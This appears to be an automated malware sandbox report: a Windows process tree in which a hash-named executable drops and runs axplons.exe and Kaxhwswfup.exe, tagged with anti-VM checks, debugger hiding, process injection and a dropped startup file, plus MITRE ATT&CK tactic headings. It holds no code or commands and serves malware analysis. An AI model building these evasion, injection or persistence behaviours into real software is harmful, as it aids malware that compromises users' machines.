C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1448

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1508
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1352

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1348

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2140

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2912

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2980

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3312

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3496
- C:\Users\Admin\AppData\Local\Temp\ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
  "C:\Users\Admin\AppData\Local\Temp\ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
      "C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3620
    - - C:\Users\Admin\AppData\Local\Temp\$77ea4744
        
        "C:\Users\Admin\AppData\Local\Temp\$77ea4744"
        5⤵
        Executes dropped EXE
        
        PID:704
    - - C:\Users\Admin\AppData\Local\Temp\$77c1559d
        
        "C:\Users\Admin\AppData\Local\Temp\$77c1559d"
        5⤵
        Executes dropped EXE
        
        PID:4108
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 308
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4672
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 316
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3652

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3860

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:4036

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4100

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4960

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:1860

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:960

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:4664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x25c,0x7ffe970dceb8,0x7ffe970dcec4,0x7ffe970dced0
  2⤵
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1952,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:3
  2⤵
  PID:1356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4116,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8
  2⤵
  PID:4108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:5040

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:512

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2128

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4984
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4108 -ip 4108
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:8
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4108 -ip 4108
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion